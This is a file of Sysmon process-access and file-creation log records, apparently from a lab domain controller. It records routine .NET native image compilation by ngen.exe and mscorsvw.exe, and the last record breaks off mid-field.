{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7136,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.465\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-0010699E0E00}\r\nTargetProcessId: 2292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.465","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-0010699E0E00}","TargetProcessId":"2292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7137,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.465\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-0010699E0E00}\r\nTargetProcessId: 2292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.465","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-0010699E0E00}","TargetProcessId":"2292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7138,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.480\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-0010D8030F00}\r\nTargetProcessId: 2292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.480","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-0010D8030F00}","TargetProcessId":"2292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7139,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.527\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-001060A20E00}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.527","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-001060A20E00}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7140,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.527\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-001060A20E00}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.527","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-001060A20E00}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7141,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.543\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-0010B4070F00}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.543","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-0010B4070F00}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7142,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:45.590\r\nProcessGuid: {A837DB8D-0495-5F25-0000-0010B4070F00}\r\nProcessId: 3852\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f0c-0\\PresentationFramework-SystemCore.dll\r\nCreationUtcTime: 2020-08-01 05:58:45.590","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:45.590","ProcessGuid":"{A837DB8D-0495-5F25-0000-0010B4070F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f0c-0\\PresentationFramework-SystemCore.dll","CreationUtcTime":"2020-08-01 05:58:45.590","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7143,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.621\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-00101D0C0F00}\r\nTargetProcessId: 2684\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.621","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-00101D0C0F00}","TargetProcessId":"2684","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7144,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.621\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-00101D0C0F00}\r\nTargetProcessId: 2684\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 